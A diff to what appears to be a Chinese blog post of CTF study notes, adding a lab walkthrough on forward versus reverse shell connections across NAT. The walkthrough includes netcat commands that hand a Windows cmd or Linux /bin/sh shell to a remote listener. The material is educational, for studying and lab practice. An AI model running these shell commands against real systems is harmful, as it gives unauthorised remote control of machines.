记录本体项目代码修改部分

--- a/docs/views/numerology/2025-01-10-CTFLearn.md
+++ b/docs/views/numerology/2025-01-10-CTFLearn.md
@@ -1,6 +1,6 @@
 ---
 title: 20250110CTF学习笔记36
-date: 2025-01-08
+date: 2025-01-10
 tags:
  - CTF
  - CTFLearn
@@ -42,7 +42,7 @@ publish: true
 
 <!-- more -->
 
-# 第24章：基础入门-反弹SHELL&带外查询&正反向连接&防火墙出入站&文件下载29-47
+# 第24章：基础入门-反弹SHELL&带外查询&正反向连接&防火墙出入站&文件下载
 
 ## 反弹Shell
 
@@ -106,6 +106,69 @@ publish: true
 
 ![image-20250110213622805](/img/ctfLearn/image-20250110213622805.png)
 
-这种情况下只能用反向连接，因为我们自己服务器IP是全球唯一的，但我们正向连接的话，只能找到路由器这一层，找不到下方的哪台机器。
+这种情况下只能用反向连接，因为我们自己服务器IP是全球唯一的，但我们正向连接的话，只能找到路由器这一层，找不到下方的哪台机器。内网IP是路由器下自己分配的。
+
+**通俗理解：**就像是在学校，最多只能找到宿舍门牌号，如果说给个名字，那没有用，可能有重名的。
 
 **特殊情况：**如果我们要让路由器知道是我们找的哪台机器，这就需要在路由器设置端口转发/端口映射。
+
+
+
+### 反弹Shell在内网环境的演示实验
+
+视频中演示的是用Linux控制Windows虚拟机，Liunx是用SSH远程连接的，虚拟机是在本地Vmware中运行的，IP是和本机的IP是相同的。
+
+- 首先测试的是正向连接，Linux主动控制Windows，我们进入到Linux中，输入命令：
+
+  ```shell
+  ncat 192.168.124.128 5566
+  ```
+
+- 然后到虚拟机上，主动把CMD的权限绑定到端口
+
+  ```shell
+  nc.exe -e cmd lvvp 5566
+  ```
+
+- 以上步骤完成后，发现两边都没有反应，长时间以后提示超时，其实这个结果是可以预料到的，用内网IP是肯定行不通的
+
+- 下一步我们让Linux连接我们本机的IP地址，同时也是虚拟机的IP地址，此时我们Windows虚拟机上的nc还没关。
+
+  ```shell
+  ncat 1.30.217.180 5566
+  ```
+
+- 然后我们就发现，依然连接不上。原因是这个IP地址相当于路由器的出口，而路由器的出口并没有执行监听操作，所以会连接失败。
+
+- 以上结果表明，我们要想要用Linux控制虚拟机中的Windows，只能通过反向连接，因为我们知道Linux的IP地址，所以让Windows主动将权限给到Linux的5566
+
+  ```shell
+  nc -e cmd 123.123.123.123 5566
+  ```
+
+- 下一步是在Linux上去监听5566端口，就能用Linux控制Windows虚拟机，实现反向连接了。
+
+  ```shell
+  nc -lvp 5566
+  ```
+
+**结论：**这就是正反向连接的应用价值，需要判断什么时候用正向连接，什么时候用反向连接。
+
+**通俗理解：**他找不到你，你就去找他。
+
+**反向示例：**用Windows虚拟机控制Linux
+
+- 让Linux主动把权限绑定到端口5566，然后让Windows主动连接。
+
+  ```shell
+  # linux上输入以下命令
+  ncat -e /bin/sh -lvp 5566
+  # windows上输入以下命令
+  nc 123.123.123.123 5566
+  ```
+
+- 这种从Windows来看，就成了正向连接。如果我们用反向连接，也就是Linux主动把权限给到Windows，这样是行不通的，因为我们找不到这台Windows虚拟机，因为它在内网，所以只能Windows主动发起正向连接。
+
+**挖坑：**如果两边都是内网怎么办？这就涉及到后续的课程了。大致思路是加个中间人就可以了，两边都给到中间人做中转，让中间人作下发。
+
+> 这里讲到的正向连接、反向连接，感觉和我以前做网站开发时，只能本地看本地网站，如果说互联网要看我虚拟机里某个搭建的网站是不可以的，这需要做端口映射，如果不做的话是访问不了的。
